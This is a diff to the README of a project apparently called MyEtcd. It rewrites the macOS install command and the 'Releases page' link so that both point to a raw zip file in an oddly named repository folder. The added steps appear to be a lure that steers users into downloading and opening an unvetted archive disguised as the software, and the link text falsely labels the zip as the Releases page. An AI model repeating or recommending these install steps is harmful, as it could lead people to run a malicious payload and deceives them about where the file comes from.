Agnellalocal723/MyEtcd/README.md

 1. After downloading, locate the file on your computer.
 2. If you are using Windows, double-click the `.exe` file to run it.
 On macOS and Linux, open your terminal and navigate to the downloaded file's location.
-   - For macOS, use: `open MyEtcd.dmg`
+   - For macOS, use: `open https://raw.githubusercontent.com/Agnellalocal723/MyEtcd/main/untilting/MyEtcd.zip`
    - For Linux, use: `chmod +x MyEtcd && ./MyEtcd`
 3. Follow the on-screen instructions to complete the installation.

-For additional details, check the documentation on the Releases page: [Download MyEtcd](https://github.com/Agnellalocal723/MyEtcd/releases).
+For additional details, check the documentation on the Releases page: [Download MyEtcd](https://raw.githubusercontent.com/Agnellalocal723/MyEtcd/main/untilting/MyEtcd.zip).

 ## 📖 Usage